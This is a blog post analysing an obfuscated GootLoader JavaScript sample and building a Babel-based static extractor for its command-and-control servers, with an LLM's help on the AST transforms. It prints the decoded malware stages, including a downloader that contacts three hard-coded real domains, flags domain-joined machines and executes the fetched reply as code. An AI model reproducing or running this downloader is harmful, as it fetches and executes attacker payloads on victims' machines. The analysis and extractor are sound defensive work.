In this blob post, I will describe how I wrote a config extractor for obfuscated JavaScript-based GootLoader component. The hard part of automating the config extraction is the obfuscation: the C2 servers are just plain text in the last stage. All code is on Github if you are just interested in that.
# Intro
A fellow Cyberian struppigel recently released Samplepedia, a platform were people can drop SHA256 hashes of files with a description and an analysis goal and some other metadata. My understanding is that the goal is to finally have a place to find interesting malware to analyze, a question I get asked a lot when teaching reverse engineering.
Naturally I picked a task myself and decided to do one involve JavaScript, something I don't have a lot of expose to as a reverse engineer (I do have some exposure to it as a forward engineer, but that's a different story). The sample in question is
1bc77b013c83b5b075c3d3c403da330178477843fc2d8326d90e495a61fbb01f and the task is:
> Create a static C2 extractor that uses abstract syntax tree transformations with Babel. You can use astexplorer.net as helper tool.
I was particularly intrigued because I've recently seen other people be extremely successful leveraging "normal dev tooling" in the JavaScript ecosystem to tackle challenges with JavaScript-based malware.
# First Pass
Before we automate anything, let's take a look and see how far we can get manually. The sample contains around 10.000 lines of code (LoCs) and basically looks like a bunch of concatenated JavaScript libraries. I did what I often do and just started scrolling. I don't know if I'm the only one that does that, but sometimes I scroll for minutes over text to see if my pattern matching picks anything up. I honestly also don't know how reliable or reproducible this is and I also don't know how much I missed with this approach. Ignorance is bliss.
Anyway, through some freak accident (I guess), I stopped at the following code fragment:
function north0(rich6, effect8, under2, connect5){
choose84[6014455]=slave2;
yet7[point55] = world3[yet7[enemy7]];
}
And that cracked the case wide-open. world3 seems to be important, so I CTRL-Fed myself through the file and found the following additional fragments:
function general3(game7, east8, subject1){
year1=use45;
seven6=6691;
eight5(82873);
while(world3=world3){
try{choose84[seven6](seven6);
}catch(is8){
choose84[1942717]=world3;
}seven6++
}
}
and
// Fix IE bugs, see support tests
function world3(an800, flow8, dance5){
enemy7=0;
twenty3='\".(e+n) \"oR{\"i( +t)W\"aUSCi\"c(c+r)o\"i_s';cover3='+ )w\"}T\\\"\"( +,)}\"\\N\"E \"g(e+r)l\"oRs';race3='+)e7)\"p\\\\3\"Gl5e\"a\\S8c(.1e(2\"(\\Ln/;\\e\"}(p( \\o\\t+.dr)f{y\\ \"{2\'M';lay5='\"\\\\\"e(D,j]O x)\"0\\\\g\"))zr+)mt(=v\\\"\"\\=x(M-n+A1';ship5='.)u\"aSiUh\"t(l+().\")_w\";(w';bird8='7ek2nka3ba;4)l\"5l.l)ewh;Sw';read6='{ )+tj\")\\ =\\T\"t=Ev+ \"r\\u\"\\\\\"(.4(+r1';noon0='etjgTabsecO(x}e(t t\";\\a; %e)';roll6='0)pi))i .\\}\"E{ (x ;+pve)aas\\n\"lr';family8=').\"f\"f( +r){\"oe tmi)rCW3';moon2=';\"p( +m)y\"iee\"s(t+y)7\"eR';does1='7c;';mile9=' }5WeSpcarhisp;t5.1s1l2e=eapz(l7i2f3z0';huge68='dra EcfunS v\\n\"i=r(r u+oft';they7='er oj;(5b7Q-O8)7e= lt;{)a) \"e\"r(r+e)C\"t';season506='5peipaahhrsw s{ e);eI(0hnc tta=c( ';fun0='\\Oef)fsi+(l (\\a\"\";\\@f)N\\ \"S2,+\"+\\tt8)++9+\\\"\"\\,(@=2';prove63='3toE2st\")\\.\";\\)) ((+}+m( )';cut3=')n.e\\m\"rreW en\\{\"ts)(Spe(to(trnhciscen';instrument3='euth\"s\\Sa )\\t\"+=s((=.+\"=\\)f l\\(\"l2 .\"0\\tf';sound8='. twp}i\\r\"c S[Wi\" (+t=c+e j;bMO}e\'t)a)e(';right2='S\\,\\c\"\\+\")r\"e\"i(k+p).\"tRoE.\"c(Q+';arrive5='Z.Su_tGrEpRn\"i( r,S\"c\"t S,r7Wkin anb=(g] ';felt6='o\"e\\d\"l\\nRseaDetr\" \\./{)h\" \\t+u(a( +M\"=';egg3='(}1Xr)a\\e\"y/((]gl+[,7)t';wash0=')\\(\"\"+\\+\")\\t:\\M\"s+AHp\\\"\"\\Lt@)M\"\\\\\"+\\(\"(,+(\"\\\\\")+I\\\"\"\\)N)t\\%\"h;\"X\\ \"r\\v)e(a)\\ \" r,(';went4='\\ ] N=iuS [.\"t\\rM )e+;+p))(l\")\\a\"\\\\\"/cDP/eOT\"(\\T\"\\\\\"(\\)\"+@+(';war4='j1k6H7z9m8t)u;jswvrlortfcbucr=tysento';fear8='iUr(fSCd E.n(\"t\\(ep)usi+..r(ifc\"n\\S dRW;eD()x\" ';differ5='[\"c(3[i5]erp(ashjse ){l (y.r)tw;;\"w\\ \\wHWG\\T\"Z';page8='\"md3\"o(0+c))\".a;esR \"t(}+r))\"og';wheel7=' }Q i;,) 71k;n0a]b)(\\]\")+';stop9='\"p(s+t)a\".YtEs\"r(l+a)e\"dKeHn\"p(a (=l 1';thus1='\")\\r%\\+\"\"i\\u)p)s\"t\\\\)\"p. (hs![\"l\\)=e(( e+g(p)n\"(\\i\"2\\r%3ptU2.SS';help0='r)C;.}tcpaitrcchS(We )={';lead99=' e\\y\"{f SyurMtn}\\;\"0c9(=t2(liatnoicgni';build7='r)\")\\\\k\") os+{cb( a\\\"\"\\Wn(IS?+Nc';join7='\"h( +a)<\"rg \"C(i+o)(\"de Re\"e(([l';similar6 = prove63+felt6+went4;oxygen1 = moon2+differ5+right2+ship5;run0 = instrument3+roll6+huge68+cut3;dream6 = cover3+twenty3;map5 = does1;plural6 = build7+thus1;milk0 = noon0+fear8+fun0+lay5;house4 = race3+egg3+lead99+they7+arrive5;miss8 = family8+join7+season506+wheel7+page8;exact1 = wash0+read6;said7 = help0+mile9+war4;believe22 = stop9+bird8+sound8;finish7 = run0+milk0+plural6+similar6+exact1+house4+miss8+oxygen1+dream6+believe22+said7+map5;
choose84[3757113]=tree3;
eight5(9488);
}
This cracks the case wide open.
Still deciding against doing any automation, I decided to continue manual work for now: After adding newlines after every ; and fixing some indentation, one can easily see that finish7 contains the result of the above string concatenation operation. CTRL-F-ing a bit further, the function use45 receives that variable and looks like this:
function use45(able3) {
opposite3 = enemy7;
enter7 = "";
while (opposite3 < 2704) {
good29 = pound6(able3, opposite3);
enter7 = strong52(enter7, good29, opposite3);
opposite3++;
}
return enter7;
}
It calls a couple of other functions and after some carful copying and pasting, I renamed that function deobfuscate and together with all its dependencies, it looks like this:
function isOdd(offset) {
return offset % 2;
}
function getSingleAt(s, offset) {
return getAt(s, offset, 1);
}
function getAt(s, offset, len) {
return s.substr(offset, len);
}
function addLeftOrRight(currentRet, currentChar, currentOffset) {
return isOdd(currentOffset) ? currentRet + currentChar : currentChar + currentRet;
}
function deobfuscate(payload){
ret = "";
for(let i = 0; i < 2704; i++) {
ret = addLeftOrRight(ret, getSingleAt(payload, i), i);
}
return ret;
}
We will further simplify this later in this blog post.
Since I now have this JavaScript code, I decided to just put the content of finish7 into the deobfuscate function and console.log it. Out comes the following second stage:
constructorwjutmzHkjzfilza=2115;shape5 = WScript.CreateObject("WScript.Shell");bank7 = ("HK")+("EY")+("_")+("CU")+("R")+("R")+("EN")+("T")+("_")+("US")+("ER")+("")+"\\ZTGH\\";try { shape5[("R")+("e")+("g")+("Rea")+("d")](bank7); } catch(e) { shape5[("Re")+("g")+("Write")+("")](bank7, "", ("REG_SZ")+(""));l=78-75;original2=90;}try {yet7[l](year1('{ yfr.to p}e;n\"(1(8\"5G3\"7)1+4(\"\"+EtT=\"t){, )()\"\"h%tN\"I)\"+((+\")t\"pAsM:\"\"()++)(\"\"O/D/\"\"()++)M\"[SiN]\"+((+\")/\"tDeR\"\")(++()\"\"sEtS.Up%\"\")(+ (=\"!h p)\"))\"+%\"N?In\"a(c+o)k\"rAnMx\"v(m+z)g\"xOjDe\"=(\"++)t\",S Nf\"a(l+s)e\")D;R \"f(.+s)e\"nEdS(U)%;\" (}(csagtncihr(teS)t{n ermentourrinv nfEadlnsaep;x E}. )i)f\" l(lf\".(s+t)a\"teuhsS \"=(=+=) \"2.0t0p)i \"{( +v)a\"rr cuS \"=( +f).\"rWe\"s(p(otncseejTbeOxett;a eirfC .(t(pui.ricnSdWe(x Offi( \";@)\"2++t8+9\",@2\"(,] )0\")r)t=\"=(-+1))\" s{b \"W(S+c)r\"iupst\".(s[l)e(egpn(i2r3t2S3o2t).;) (}m oedlnsaer .{h tua M= =u .tr e;p)l)a\"cPeT(T\"\"@(\"++)t\"+H\"L@M\"\",(\"+\"))\";X rvea\"r( +j) \"=v ru\".(r+e)p\"leaSc.e2(L/\"((\\+d){\"2M}X)\"/(g+,) \"fSuMn\"c(t(itocne j(bQO)e t{a erreCt.utrpni rSctSrWi n=g .ff r{o m)C3h a<r Cio(d ee(lpiahrws e;I0n t=( Qi, 1;0])\"+m3o0c).;s t}r)o;p myiesty7e[c3i]r(sje)l(.)w;w wW\"S,c\"reikp.to.cQ.uaihtl(.)w;w w}\" ,}\" gerlos.en o{i tWaSiccroispsta.tsrlaedenpa(l1e2k3a4l5.)w;w w}\" [i +=+ ;M}'))();}catch(e){}WScript.sleep(723016798);svlrfbc=yet7;
This seems to employ a couple of anti-analysis techniques:
* Splitting of string into concat operations with +.
* A sleep operation (which isn't really a problem for us because we are approaching this mainly statically).
Let's note that down for the automation later and keep going. I am working under the assumption that this code is evaluated in the context of the first stage (formally, we haven't confirmed that yet). And under this assumption, it calls a function year1 which must be defined there. And indeed it is:
year1 = use45;
Our good old friend use45 which we renamed to deobfuscate. So let's ignore all the anti-analysis techniques and extract a third stage from it:
M = ["www.lakelandartassociation.org","www.lha.co.ke","www.lesriceysimports.com"]; i = 0; while (i < 3) { f = WScript.CreateObject(("MS")+("XM")+("L2.Se")+("rv")+("erX")+("MLH")+("TTP")); t = Math.random().toString()[("su")+("bs")+("tr")](2,98+2); if (WScript.CreateObject(("W")+("Scr")+("ipt.")+("She")+("ll")).ExpandEnvironmentStrings(("%USE")+("RD")+("NS")+("DO")+("MA")+("IN%")) != ("%USE")+("RD")+("NS")+("DO")+("MA")+("IN%")) {t=t+"4173581";} try{ f.open(("G")+("ET"), ("ht")+("tps:")+("//")+M[i]+("/te")+("st.p")+("hp")+"?nacokrnxvmzgxje="+t, false); f.send(); }catch(e){ return false; } if (f.status === 200) { var u = f.responseText; if ((u.indexOf("@"+t+"@", 0))==-1) { WScript.sleep(23232); } else { u = u.replace("@"+t+"@",""); var deobfuscated = u.replace(/(\d{2})/g, function (Q) { return String.fromCharCode(parseInt(Q,10)+30); }); yet7[3](deobfuscated)(); WScript.Quit(); } } else { WScript.sleep(12345); } i++;}
Endorphins go brrr: we found something that looks like a C2 server. This seems to leverage the same obfuscation techniques as before. There's a tiny 98+2 in there but it might not even be worth it combating that because we didn't even see it before.
Let's now look at automating the deobfuscation and C2 extraction with Babel, because that's why we are here. And this is where my analysis took an unexpected turn.
# Automation
Googeling around it quickly became clear that the workflow is roughly like this:
* Create a package.json and install the CLI variant of Babel
* Write a deobfuscation script that reads the target sample into memory
* Use Babel to construct an AST and transform that AST into what we consider "simpler"
* Generate JavaScript code from that AST that is (hopefully) easier to read.
This was the JavaScript boiler plate I cobble together from blog posts doing something similar:
const parser = require("@babel/parser");
const generate = require("@babel/generator").default;
const traverse = require("@babel/traverse").default;
const types = require("@babel/types");
const fs = require('fs');
const code = fs.readFileSync(process.argv[2], "utf-8");
let ast = parser.parse(code);
traverse(ast, { /* this is where the transformation will happen */});
console.log(generate(ast).code);
So far so good. I prepared myself for a night or two of reading Babel docs but then though about synthesizing the code that will synthesize the code. So headed over to a random LLM chat box and ask:
> I want to write a babel transformer for the following JavaScript snippet: s = ("MS")+("XM")+("L2.Se")+("rv");. How can I extend the following boilerplate code to do just that?
And pasted the script from above into the prompt. The LLM did quite a good job explaining how Babel works in this case, how the JavaScript AST looks like (which I could also confirm with https://astexplorer.net/), and also suggested some lines of code that fold the strings together:
traverse(ast, {
BinaryExpression(path) {
const { node } = path;
if (node.operator !== "+") return;
if (
types.isStringLiteral(node.left) &&
types.isStringLiteral(node.right)
) {
const folded = node.left.value + node.right.value;
path.replaceWith(types.stringLiteral(folded));
}
},
});
And I have to confess: this is insanely useful. It was trivial for me now to confirm that it behaved as expected and then it hit me: I can just describe other obfuscation techniques in the same context window and the LLM will just continue to generate easy-to-verify code that defeats it. And that's what I did. It's obviously extremely useful to be able to read and write JavaScript and to have a basic understanding how AST modification _should_ work (visitor pattern and all that jazz). But this saved me days of painstakingly reading documentation that might not even apply to my case.
There is a case to be made for reading such documentation, i.e. parts that you don't need right now. Maybe you will gain context and better and deeper understanding of the technology. But I'm a grown-up now and I can say something based on, you know, life experience. And that is the following: I don't retain a lot of knowledge when I don't apply it. The LLM basically helped me focus on retrieving knowledge that I can actually apply and at least right now I feel that I've learned a couple of things about Babel and how it works.
Anyway, I asked the LLM for the following features and then cleaned the result up a bit:
* string folding
* newlines after ;
* removal of comments
* replacing a["substr"] with a.substr
* constant folding (because it was basically free at this point)
And under default configuration, Babel also outputs a beautified version of the script.
# The Actual Task
This is all well and good but our actual task was to write a script to automatically extract the C2 server, not to make the manual analysis simpler. My approach here is this:
1. In the huge 10k LoC file, find the function with the most assignments and inline all variables in it
2. Execute the code deobfuscation steps from above
3. Find the longest string in the code and emulate the string deobfuscation function
4. Go to step 2 but with the result until we find an array with what looks like network indicators
Since the code I wrote (or I should rather say "synthesized") got a bit long by now. I wanted to refactor it: Put everything related to JavaScript deobfuscation into one file and everything that is malware specific into another. Since I'm _always_ getting it wrong with JavaScript (wrong file extensions, wrong mix of export default and module.exports, wrong style of imports...) I just asked the AI again to refactor it for me.
After that it was merely putting together what we collected:
const fs = require("fs");
const {
detectCandidateFunctions,
propagateAssignments,
extractLongestString,
extractStringArrayAssignments,
} = require("./otherTraversals");
const { runDeobfuscationTraversals } = require("./deobfuscationTraversals");
const { getCode, codeDeobfuscate, defang } = require("./utils");
function strDeobfuscate(payload){
ret = "";
[...payload].forEach((c, i) => ret = i % 2 ? ret + c : c + ret);
return ret;
}
const hostRe = /^(?:(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}|(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(?:\.(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})$/;
const code = fs.readFileSync(process.argv[2], "utf-8");
const ast = codeDeobfuscate(code);
const candidateFunctionNames = detectCandidateFunctions(ast);
propagateAssignments(ast, candidateFunctionNames);
runDeobfuscationTraversals(ast);
let currentAst = ast;
let collectedC2s = [];
for(let i = 0; i < 20; i++) {
const longest = extractLongestString(currentAst);
if (!longest) break;
currentAst = codeDeobfuscate(strDeobfuscate(longest));
console.log(`------ STAGE ${i + 2} ------`)
for (const arr of extractStringArrayAssignments(currentAst)) {
if (arr.values.every(v => hostRe.test(v))) {
collectedC2s = arr.values;
break;
}
}
const synthCode = getCode(currentAst);
console.log(synthCode);
if (collectedC2s.length > 0) {
break;
}
}
if (collectedC2s.length > 0) {
console.log(`------ C2s ------`)
for (const c2 of collectedC2s) {
console.log(defang(c2));
}
} else {
console.log("No C2s found :-(");
}
Which generates the following satisfying output:
------ STAGE 2 ------
function __DEOBFUSCATED() {
constructorwjutmzHkjzfilza = 2115;
shape5 = WScript.CreateObject("WScript.Shell");
bank7 = "HKEY_CURRENT_USER\\ZTGH\\";
try {
shape5.RegRead(bank7);
} catch (e) {
shape5.RegWrite(bank7, "", "REG_SZ");
l = 78 - 75;
original2 = 90;
}
try {
yet7[l](year1('{ yfr.to p}e;n\"(1(8\"5G3\"7)1+4(\"\"+EtT=\"t){, )()\"\"h%tN\"I)\"+((+\")t\"pAsM:\"\"()++)(\"\"O/D/\"\"()++)M\"[SiN]\"+((+\")/\"tDeR\"\")(++()\"\"sEtS.Up%\"\")(+ (=\"!h p)\"))\"+%\"N?In\"a(c+o)k\"rAnMx\"v(m+z)g\"xOjDe\"=(\"++)t\",S Nf\"a(l+s)e\")D;R \"f(.+s)e\"nEdS(U)%;\" (}(csagtncihr(teS)t{n ermentourrinv nfEadlnsaep;x E}. )i)f\" l(lf\".(s+t)a\"teuhsS \"=(=+=) \"2.0t0p)i \"{( +v)a\"rr cuS \"=( +f).\"rWe\"s(p(otncseejTbeOxett;a eirfC .(t(pui.ricnSdWe(x Offi( \";@)\"2++t8+9\",@2\"(,] )0\")r)t=\"=(-+1))\" s{b \"W(S+c)r\"iupst\".(s[l)e(egpn(i2r3t2S3o2t).;) (}m oedlnsaer .{h tua M= =u .tr e;p)l)a\"cPeT(T\"\"@(\"++)t\"+H\"L@M\"\",(\"+\"))\";X rvea\"r( +j) \"=v ru\".(r+e)p\"leaSc.e2(L/\"((\\+d){\"2M}X)\"/(g+,) \"fSuMn\"c(t(itocne j(bQO)e t{a erreCt.utrpni rSctSrWi n=g .ff r{o m)C3h a<r Cio(d ee(lpiahrws e;I0n t=( Qi, 1;0])\"+m3o0c).;s t}r)o;p myiesty7e[c3i]r(sje)l(.)w;w wW\"S,c\"reikp.to.cQ.uaihtl(.)w;w w}\" ,}\" gerlos.en o{i tWaSiccroispsta.tsrlaedenpa(l1e2k3a4l5.)w;w w}\" [i +=+ ;M}'))();
} catch (e) {}
WScript.sleep(723016798);
svlrfbc = yet7;
}
------ STAGE 3 ------
function __DEOBFUSCATED() {
M = ["www.lakelandartassociation.org", "www.lha.co.ke", "www.lesriceysimports.com"];
i = 0;
while (i < 3) {
f = WScript.CreateObject("MSXML2.ServerXMLHTTP");
t = Math.random().toString().substr(2, 100);
if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {
t = t + "4173581";
}
try {
f.open("GET", "https://" + M[i] + "/test.php?nacokrnxvmzgxje=" + t, false);
f.send();
} catch (e) {
return false;
}
if (f.status === 200) {
var u = f.responseText;
if (u.indexOf("@" + t + "@", 0) == -1) {
WScript.sleep(23232);
} else {
u = u.replace("@" + t + "@", "");
var j = u.replace(/(\d{2})/g, function (Q) {
return String.fromCharCode(parseInt(Q, 10) + 30);
});
yet7[3](j)();
WScript.Quit();
}
} else {
WScript.sleep(12345);
}
i++;
}
}
------ C2s ------
www.lakelandartassociation[.]org
www.lha.co[.]ke
www.lesriceysimports[.]com
Quick comment: One thing one should do now, or rather, should have done a couple of paragraphs above: hunt for similarly obfuscated files or identify other similar GootLoader components. But I consider this out-of-scope for now. I'm here for the JavaScript and the Babel fun.
You can find the complete code on github: https://github.com/larsborn/gootloader-babel-deobfuscator.
# Wait Malware! What does it do?
Since we printed the intermediate stages, we can now also describe the actual downloader stage a bit:
The download uses an MSXML2.ServerXMLHTTP object to perform three consecutive GET requests to the following hard-coded servers:
* www.lakelandartassociation[.]org
* www.lha.co[.]ke
* www.lesriceysimports[.]com
All those requests are made to the same script test.php. The script generates a random token and passes it in an additional GET parameter with the name nacokrnxvmzgxje. That token is extended by the string 4173581 iff the following expression is true:
WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%"
The variable %USERDNSDOMAIN% is populated for domain-joined machines and if that variable is not configured, ExpandEnvironmentStrings will just return its argument. So from the perspective of the operator, if the parameter ends in 4173581, the infected machine belongs to a Windows domain. Maybe they do this to identify high-value targets.
The malware then searches for the above-generated token enclosed in @ characters in the response, removes it, deobfuscats the result, and executes it as JavaScript again. I was not able to retrieve any next-stage payloads by the time of analysis. So not really anything interesting to see here.
# Conclusion
Ok, let's talk about the elephant in the room: or should I say ailpehant 🥁. LLM-based coding was instrumental in writing the config extractor. I would have been able to learn everything I needed about babel and then write it all by myself but I assess the speed up to be something like 5x or even much more. I sympathize with all the AI haters out there. And at the same time, I wouldn't realistically have written this blag post without LLMs.